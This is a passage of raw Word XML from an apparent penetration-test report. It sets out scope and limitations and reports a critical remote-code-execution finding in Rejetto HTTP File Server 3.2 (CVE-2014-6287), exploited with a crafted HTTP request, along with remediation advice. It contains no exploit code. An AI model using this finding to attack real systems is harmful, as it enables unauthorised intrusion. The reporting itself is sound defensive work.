    <w:p w14:paraId="45E7B356" w14:textId="77777777" w:rsidR="00B160F3" w:rsidRDefault="00B160F3" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Documented each step, capturing screenshots and command logs to build a comprehensive view of the vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D7BB3D" w14:textId="77777777" w:rsidR="00B160F3" w:rsidRDefault="00B160F3" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Compiled findings into a detailed report with risk ratings and recommendations for remediation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFC90B2" w14:textId="77777777" w:rsidR="00F168E8" w:rsidRDefault="00F168E8" w:rsidP="007D2747">
      <w:pPr>
        <w:ind w:left="1080"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13CB595B" w14:textId="4336FA90" w:rsidR="003B094A" w:rsidRDefault="00B160F3" w:rsidP="007D2747">
      <w:r>
        <w:t>This blended approach, which includes elements of the OWASP Top 10 methodology along with specialized techniques for Windows systems, provided a thorough assessment of the target's security posture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA538E9" w14:textId="008EB6FE" w:rsidR="00821B39" w:rsidRDefault="00821B39" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_heading=h.17dp8vu" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:t>5. Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C84F7EB" w14:textId="77777777" w:rsidR="00821B39" w:rsidRDefault="00821B39" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 Targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A99B97" w14:textId="4701C68F" w:rsidR="00821B39" w:rsidRDefault="00821B39" w:rsidP="007D2747">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>The penetration testing engagement focused on the following assets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C2C726" w14:textId="0144A4B1" w:rsidR="00821B39" w:rsidRDefault="00821B39" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC3560">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Web:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The assessment included the web application hosted at </w:t>
      </w:r>
      <w:r w:rsidR="00EB0EEA" w:rsidRPr="00EB0EEA">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>100.113.47.90</w:t>
      </w:r>
      <w:r w:rsidR="00EB0EEA">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>where we evaluated potential vulnerabilities related to the application’s interface, authentication mechanisms, and overall security configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025EC7BD" w14:textId="0DF3E290" w:rsidR="00821B39" w:rsidRDefault="00821B39" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC3560">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The evaluation encompassed network-level testing against the IP address </w:t>
      </w:r>
      <w:r w:rsidR="006F7D84">
        <w:t>100.113.47.90</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. This included reconnaissance, vulnerability scanning, exploitation attempts (e.g., via the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rejetto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> HTTP File Server 3.2 vulnerability), and post-exploitation activities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0921435A" w14:textId="77777777" w:rsidR="00821B39" w:rsidRDefault="00821B39" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>5.2 Limitations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F651378" w14:textId="32DBCE9B" w:rsidR="00821B39" w:rsidRDefault="00821B39" w:rsidP="007D2747">
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:t>While our testing was extensive, the engagement did not cover every possible attack vector. Specifically, the following areas were outside the scope of this assessment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A8A043" w14:textId="77777777" w:rsidR="00821B39" w:rsidRDefault="00821B39" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC3560">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Denial-of-Service (DoS) Attacks:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The testing did not include any DoS or distributed DoS attacks, as these can disrupt services and impact operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6718F09F" w14:textId="77777777" w:rsidR="00821B39" w:rsidRDefault="00821B39" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006F7D84">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Physical Security:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Assessments of physical access controls and hardware-based vulnerabilities were not included.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DB00C6" w14:textId="79687EB5" w:rsidR="00CC3560" w:rsidRDefault="00821B39" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC3560">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Insider Threats:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The evaluation did not cover scenarios involving insider threats or social engineering tactics beyond the phishing campaign conducted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7515E7" w14:textId="24448C2D" w:rsidR="00D93A91" w:rsidRDefault="00821B39" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r w:rsidRPr="007D2747">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Third-Party Applications:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Vulnerabilities in third-party applications not directly hosted on the target web server or network were not considered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63549232" w14:textId="77777777" w:rsidR="007D2747" w:rsidRDefault="007D2747" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="240"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5560679E" w14:textId="77777777" w:rsidR="007D2747" w:rsidRDefault="007D2747" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1037B8A3" w14:textId="3D616D1F" w:rsidR="003B094A" w:rsidRPr="00D93A91" w:rsidRDefault="00963AEF" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_heading=h.lnxbz9" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6. Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687C6DE0" w14:textId="7BBD843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Vulnerability Title</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4963B0EB"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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2F9378" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D88EA23" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="00963AEF" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Severity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Critical</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FFC000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Medium</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="92D050"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Informational </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(Based on CVSS v3.0 Calculation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1535065A"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Description </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>about</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the bug and then details about its fining in the app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E6DD4E" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11E4436F" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="00963AEF" w:rsidP="007D27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Vulnerable Resources (URL/IP address/Asset): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D3BEE8F" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F4D5C0B"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Attack Scenario</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: add screenshots, and texts explaining exactly how to reapply the attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B88899E" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B5DEEA1" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="00963AEF" w:rsidP="007D27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69E2BB2B" w14:textId="77777777" w:rsidR="003B094A" w:rsidRDefault="003B094A" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72E0EAB4"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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> URL reference where I can know more about the bug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CDEEF0" w14:textId="77777777" w:rsidR="00054F23" w:rsidRPr="00914449" w:rsidRDefault="00054F23" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_heading=h.35nkun2" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidRPr="00914449">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6. Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE73328" w14:textId="77777777" w:rsidR="00054F23" w:rsidRDefault="00054F23" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00054F23">
        <w:t>Vulnerability Title:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rejetto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> HTTP File Server 3.2 Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A262AA" w14:textId="77777777" w:rsidR="00054F23" w:rsidRPr="002E5671" w:rsidRDefault="00054F23" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E5671">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ID: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB00B7E" w14:textId="0D9DAC1A" w:rsidR="00054F23" w:rsidRDefault="00054F23" w:rsidP="007D2747">
      <w:r w:rsidRPr="002E5671">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Critical</w:t>
      </w:r>
      <w:r w:rsidR="00AD2979">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="0080537F" w:rsidRPr="0080537F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>CVE:2014-6287</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0080537F">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB5C4CE" w14:textId="77777777" w:rsidR="00054F23" w:rsidRPr="002E5671" w:rsidRDefault="00054F23" w:rsidP="007D2747">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E5671">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4BD91F" w14:textId="035995AB" w:rsidR="00054F23" w:rsidRDefault="00054F23" w:rsidP="007D2747">
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">During our testing, we discovered that the Windows 10 system was running </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rejetto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> HTTP File Server 3.2—a service with well-known security weaknesses. This vulnerability enables unauthenticated remote code execution, which could allow an attacker to fully compromise the affected system. Our tests confirmed that exploiting this vulnerability provided unauthorized access and could serve as a </w:t>
      </w:r>
      <w:r w:rsidR="002E5671">
        <w:t>steppingstone</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to further attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2576243F" w14:textId="1CBA0FCE" w:rsidR="00054F23" w:rsidRPr="002E5671" w:rsidRDefault="00054F23" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E5671">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerable Resources (URL/IP Address/Asset):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40593E0F" w14:textId="77777777" w:rsidR="00054F23" w:rsidRDefault="00054F23" w:rsidP="007D2747">
      <w:r w:rsidRPr="002E5671">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Target IP:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 100.113.47.90</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAE8FA1" w14:textId="77777777" w:rsidR="00054F23" w:rsidRDefault="00054F23" w:rsidP="007D2747">
      <w:r w:rsidRPr="002E5671">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Asset:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Windows 10 server hosting </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rejetto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> HTTP File Server 3.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C8E695" w14:textId="77777777" w:rsidR="00054F23" w:rsidRPr="002E5671" w:rsidRDefault="00054F23" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E5671">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attack Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7AD7DA" w14:textId="77777777" w:rsidR="00D93A91" w:rsidRDefault="00054F23" w:rsidP="007D2747">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>A reconnaissance phase using Nmap revealed open ports and identified the operating system and running services.</w:t>
      </w:r>
      <w:r w:rsidR="00D93A91">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C1BC03B" wp14:editId="7FA37B23">
            <wp:extent cx="5539740" cy="3962400"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="1738398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8504"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5551879" cy="3971083"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="147DA9C5" w14:textId="02D431B1" w:rsidR="00FE25F0" w:rsidRDefault="00D93A91" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00B50534">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
    </w:p>
    <w:p w14:paraId="5FEB4BFD" w14:textId="6FD3A621" w:rsidR="00054F23" w:rsidRDefault="00054F23" w:rsidP="007D2747">
      <w:r>
        <w:t xml:space="preserve">Using targeted exploit techniques, we sent a crafted HTTP request that triggered </w:t>
      </w:r>
      <w:r w:rsidR="00A7540E">
        <w:t>vulnerability</w:t>
      </w:r>
      <w:r>
        <w:t>, resulting in remote code execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AE1EE2" w14:textId="77777777" w:rsidR="00D93A91" w:rsidRDefault="00D93A91" w:rsidP="007D2747"/>
    <w:p w14:paraId="42FEFDA7" w14:textId="062EA4CB" w:rsidR="00CF7028" w:rsidRDefault="002F1ECC" w:rsidP="007D2747">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D2BAD6C" wp14:editId="4674AC07">
            <wp:extent cx="6027420" cy="3581400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="115766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7420" cy="3581400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D64BF24" w14:textId="051D6141" w:rsidR="008D1701" w:rsidRPr="00D93A91" w:rsidRDefault="00CF7028" w:rsidP="007D2747">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="00B50534">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
    </w:p>
    <w:p w14:paraId="1A44E7D7" w14:textId="483DFECC" w:rsidR="008D1701" w:rsidRPr="008D1701" w:rsidRDefault="008D1701" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D1701">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommendations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1473CB30" w14:textId="25CF3C31" w:rsidR="00054F23" w:rsidRDefault="00054F23" w:rsidP="007D2747">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Update or replace the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Rejetto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> HTTP File Server with a version that addresses </w:t>
      </w:r>
      <w:r w:rsidR="00A7540E">
        <w:t>vulnerability</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3946B9B8" w14:textId="53DFBF45" w:rsidR="00054F23" w:rsidRDefault="00054F23" w:rsidP="007D2747">
      <w:r>
        <w:t xml:space="preserve">Implement strict access controls and network segmentation to limit exposure </w:t>
      </w:r>
      <w:r w:rsidR="00576C38">
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> such services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694F940B" w14:textId="77777777" w:rsidR="00054F23" w:rsidRDefault="00054F23" w:rsidP="007D2747">
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r>
        <w:t>Conduct regular vulnerability scans and penetration tests to promptly identify and remediate similar issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEF5FC9" w14:textId="24A92116" w:rsidR="00054F23" w:rsidRPr="008D1701" w:rsidRDefault="00054F23" w:rsidP="007D2747">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D1701">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reference:</w:t>
      </w:r>
      <w:r w:rsidR="00EF278D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EF278D">
        <w:t>(</w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00EF278D" w:rsidRPr="0080537F">
          <w:rPr>
